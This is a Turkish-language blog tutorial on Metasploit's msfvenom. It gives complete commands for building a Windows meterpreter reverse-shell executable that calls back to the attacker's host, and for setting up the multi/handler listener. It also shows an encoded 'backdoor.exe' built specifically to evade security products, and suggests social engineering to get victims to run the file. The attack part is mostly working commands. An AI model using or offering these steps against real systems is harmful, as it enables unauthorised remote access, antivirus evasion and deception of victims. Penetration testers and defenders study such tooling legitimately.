Msfvenom Kullanımı

Bu yazımızda Metasploit ile birlikte gelen Msfvenom aracının kullanımından bahsedeceğiz.

Msfvenom aracı ile çeşitli payloadlar üretebilir ve bu payloadların güvenlik çözümlerinden atlatılması için encoding işlemleri gerçekleştirebilirsiniz. Msfvenom öncesi bu işlem msfpayload ve msfencode aracları ile gerçekleştiriliyordu. Payload oluştururken msfpayload’ı, encoding işlemi gerçekleştirileceği zaman ise msfencode aracı kullanıyordu. Msfvenom ile birlikte bu iki aracın yetenekleri birleştirilmiş durumda.

Kısa bir giriş yaptıktan sonra msfvenom’un özelliklerinden ve kullanımından bahsedelim. Terminalı açıp “msfvenom -h” komutu ile msfvenom’un alacağı parametrelere ve özelliklere bakalım.

msfvenom

-p <payload> : Hangi payload’ı kullanacağımızı bu parametre ile veriyoruz.
-l : Listeleme işlemlerini bu parametre ile yapıyoruz. Örneğin: kullanılabilir payloadları ve encoder’ları listeleyebiliriz.

msfvenom payloads

-f <format> : Oluşturduğumuz dosyanın hangi formatta çıktı vereceğini belirtiyoruz. “msfvenom –help-formats” komutu ile hangi formatlar ile çıktı verebileceğini görebilirsiniz.

msfvenom formats

-e <encoder> : Hangi encoder’ı seçeceğimizi bu parametre ile belirtiyoruz. Bulunan encoder’ları listelemek için “msfvenom -l encoders” komutunu kullanabilirsiniz.

msfvenom encoders

-a <arch> : Hangi mimariye uygun çalışacağını belirttiğimiz parametre.
–platform : Oluşturduğumuz dosyanın çalışacağı platformu belirttiğimiz parametre.
-b : Kötü karakterleri (Bad Characters) temizler.
-i : Oluşturacağımız dosyada encoding işleminin kaç defa yapılacağını bu parametre ile belirtebiliriz.
-o : Oluşturulan dosyanın nereye çıkarılacağını belirten parametre.
-x : Oluşturulacak dosyayı belirtilen bir çalıştırılabilir dosya ile birleştirir. bu parametre kullanılırken dosyanın korunması için “-k” parametresininde kullanılması gerekir.

Bir örnek yapalım şimdi. payload olarak windows/meterpreter/reverse_tcp‘yi kullanacağız. Reverse bağlantı yapacağımız için LHOST ve LPORT parametrelerini gireceğiz. LHOST’a kendi ip adresimiz, LPORT’a ise dinlenilecek olan port numarası girilecek.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.170.139 LPORT=4444 -f exe -a x86 –platform windows > zararli.exe” komutu ile dosyamızı oluşturuyoruz.

msfvenom payload

Bundan sonraki kısım hedef sistemde sizin oluşturduğunuz dosyanın çalıştırılması gerekiyor.
Dosyamızı oluşturduktan sonra dinleme moduna geçmemiz gerekiyor. Bu kısmı daha önceki yazımızda işlemiştik. Alttaki linkten erişebilirsiniz.

Metasploit Kullanımı

multi handler

Metasploit‘i açıyoruz. Terminalden “msfconsole” ile. daha sonra dinleme işlemleri için “multi/handler” i kullanacağız.
use exploit/multi/handler” komutu ile bu modulünü seçiyoruz. Ardından payload seçimi yapacağız “set PAYLOAD windows/meterpreter/reverse_tcp” komutu ile payloadımızı seçtik. Ardından “show options” ile bizden istediğini parametrelere bakıyoruz. “set LHOST ip_adresimiz” komutu ile ip adresimi verdik bizden LPORT ‘ta istiyor ama ben zaten 4444 olarak atamıştım dosyamızı oluştururken o yüzden bu kısmı değişmemize gerek yok.

Gerekli parametrelerimizi verdikten sonra tek yapmamız gerek “exploit” komutunu çalıştırıp dinleme moduna geçmemiz. Oluşturduğumuz dosya hedef sistemde açıldığında biz meterpreter oturumu elde etmiş olacağız. Hedef sistemde dosya açma kısmını ise sosyal mühendislik yöntemleri ile yaptırabilirsiniz.

meterpreter

Resimde görmüş olduğunuz üzere hedef sistemde dosyamız çalıştırıldığında oturum elde etmiş olduk.
Payload oluşturma işlemini gördük şimdi ise msfvenom ile payload oluşturup encoding işlemi yapalım. Başta da söylediğim gibi bu işlem güvenlik çözümlerini atlatmaya yönelik yapılmaktadır.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.170.139 LPORT=4444 -a x86 –platform windows -e x86/shikata_ga_nai -i 5 -f exe > backdoor.exe” komutu ile payloadımıza 5 kez encoding işlemi uyguladık.

encoding

Msfvenom Kullanımı” için bir yorum

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir